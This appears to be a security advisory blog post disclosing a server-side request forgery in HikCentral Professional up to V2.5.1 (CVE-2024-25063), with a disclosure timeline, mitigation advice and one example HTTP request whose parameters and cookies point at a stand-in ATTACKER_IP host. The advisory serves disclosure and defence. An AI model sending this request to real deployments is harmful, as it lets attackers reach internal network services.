Server-Side Request Forgery in HikCentral Professional <= V2.5.1
Advisories / May 14, 2024 • 1 min read
Tags: web exploit
During an engagement, I encountered HikCentral Professional. I did not find any relevant CVEs and therefore decided to download the software and perform a quick analysis. Upon examining the related configuration files, I immediately identified a Server-Side Request Forgery (SSRF) in the NGINX configuration file. The SSRF allowed an attacker to proxy requests via HikCentral Professional, which could lead to severe consequences. For example, an attacker could use the vulnerability to reach into a private network and access internal services.
To my surprise, the vulnerability is still present as of today.
Disclosure Timeline:
- 2023-05-11: Initial report sent to HikVision
- 2023-05-19: HikVision confirms the issue and claims to have developed a fix that will be released in the latest version
- 2023-05-23: HikVision informs me that the vulnerability will be assigned a CVE
- 2023-11-10: Sent a follow-up email
- 2023-11-10: HikVision informs me they are still working on a fix and they believe an update will be released at the end of the year
- 2024-02-16: HikVision informs me CVE-2024-25063 has been reserved
- 2024-03-01: CVE-2024-25063 is published
Mitigation
No official fix have been published. It is recommended to not expose HikCentral Professional to the Internet. Should that be required, use IP whitelisting.
Technical Description
The vulnerability lies in the NGINX configuration file which receives user-input and directly passes it to the proxy_pass
directive.
Below is an example of parameters in an HTTP requests that are directly used in the proxy_pass
directive:
GET /SDK/?device=ATTACKER_IP&deviceroute0=ATTACKER_IP&accesstype1=http&accesstype0=http&AgentAddress=ATTACKER_IP HTTP/1.1
Host: 127.0.0.1
Cookie: transpondvsm=ATTACKER_IP; transpondv4=ATTACKER_IP; agent=ATTACKER_IP
Connection: close
In the example above, all instances of ATTACKER_IP
is vulnerable.